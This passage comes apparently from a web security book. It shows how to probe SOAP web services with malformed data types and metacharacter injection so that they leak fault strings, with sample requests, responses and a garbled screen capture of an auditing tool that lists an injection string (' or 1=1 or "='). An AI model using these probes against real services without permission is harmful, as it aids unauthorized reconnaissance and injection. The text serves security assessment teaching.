Ajax Hacks

Tampering with Data Types of the SOAP Message

Here is an example of a SOAP request that takes an array as input.

<?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://www.example.com/lixusnet/example.jws" xmlns:types="http://www.example.com/lixusnet/example.jws/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <tns:solvesys>

<Arr href="#id1" /> </tns:solvesys>

<soapenc:Array id="id1" soapenc:arrayType="xsd:double">

<Item>0</Item> </soapenc:Array> </soap:Body> </soap:Envelope>

The following node gives away information about the input parameter—an array of items.

<soapenc:Array id="id1" soapenc:arrayType="xsd:double">

xsd:double indicates that the array consists of two nodes of type double. In other words, we need to supply two nodes of <Item>0</Item>. Instead, we choose to supply just one of the nodes and try to see what sort of array is returned as faultstring.

<?xml version="1.0" encoding="utf-16"?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <soapenv:Body> <soapenv:Fault>

<faultcode>soapenv:Server.userException</faultcode> <faultstring>org.xml.sax.SAXParseException:

Content is not allowed in prolog.</faultstring> <detail /> </soapenv:Fault> </soapenv:Body> </soapenv:Envelope>

We receive a fault string with an exception that points to a SAX parsing error. This is a significant information leak. The fault string points to information about the parsing behavior of the application server. Similarly, if an attacker passes invalid data types to Web services, the following error is generated.

<?xml version="1.0" encoding="utf-16"?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <soapenv:Body> <soapenv:Fault>

<faultcode>soapenv:Server.userException</faultcode> <faultstring>java.lang.IllegalArgumentException: Illegal pattern character 'r'</faultstring>

<detail /> </soapenv:Fault> </soapenv:Body> </soapenv:Envelope>

More information leaks mean more pieces of this Web services jigsaw puzzle that fit. As this set of information is collected and put into perspective, we may be able to draw a better picture about the technology and application layer logic in use and other significant information.

A complete assessment of .NET Web services can be done using wsScanner. It has an auto audit feature as part of the component wsAudit (see Figure 12.3). Here is a sample of how to go about assessment, once profiling is done. You will need to start the proxy listener and make sample requests to Web services with this tool to capture the request. Only then proceed with a full parameter injection audit.

^JwSAudit Properties

"MetaCharacters -

r- Enter Characters p Bruteforce —

fi Enter Characters [

^JwSAudit Properties

Data Types Audit		SQL Injection
|7 Enter Characters		n: Enter Characters
j"

"MetaCharacters -

r- Enter Characters

fi Enter Characters [

XPath Inaction |~l Enter Characters		Attack S tuny r Enter Characters
j' or 1=1 or "='		1 ^m
		Usei Pdsswuiil 1S elect Parameter jSelect Parameter Select file Select file 1 ^Jj 1 -Buffer Overflow jj VEnter Information (Select ParameterBuffer Character p~" Start Sizèjï End Size pj Increment pf" -Buffer Overflow jj VEnter Information (Select ParameterBuffer Character p~" Start Sizèjï End Size pj Increment pf" SOAP Response Analysis l|J Enter Information Rule File (Regex) —i Note OK FIGURE 12.3 Auditing the Web services. FIGURE 12.3 Auditing the Web services. It is also possible to launch metacharacter injection and data type mismatch attacks on Web services. Once the list of characters has been selected, the tool will send requests to the server after appending that character to each of the SOAP request parameters. We can see the following request and response for auto audit. POST /ws/dvds4less.asmx HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.832) Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/getProductInfo" Host: 192.168.1.55 Content-Length: 317 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><getProductInfo xmlns="http://tempuri.org/"><id>a</id> </getProductInfo></soap:Body></soap:Envelope> *** Response *** HTTP/1.1 500 Internal Server Error. Server: Microsoft-IIS/5.0 Date: Sun, 16 Sep 2007 09:15:37 GMT X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/xml; charset=utf-8 Content-Length: 879 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:soap=http://schemas.xmlsoap.org/soap/envelope/ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. —&gt; System.Data.SqlClient.SqlException: Invalid column name 'a1, at System.Data.SqlClient.SqlCommand.ExecuteReader (CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream) at System.Data.SqlClient.SqlCommand.ExecuteReader() at dvds4less.getProductInfo(String id) in C:\Inetpub\wwwroot\dvds4less.net\ws\dvds4less.asmx: line 29 --- End of inner exception stack trace ---</faultstring> <detail /> </soap:Fault> </soap:Body> </soap:Envelope> Manually inspect all the responses received for suspicious faultstrings from the Web services once all requests have been sent.

0 0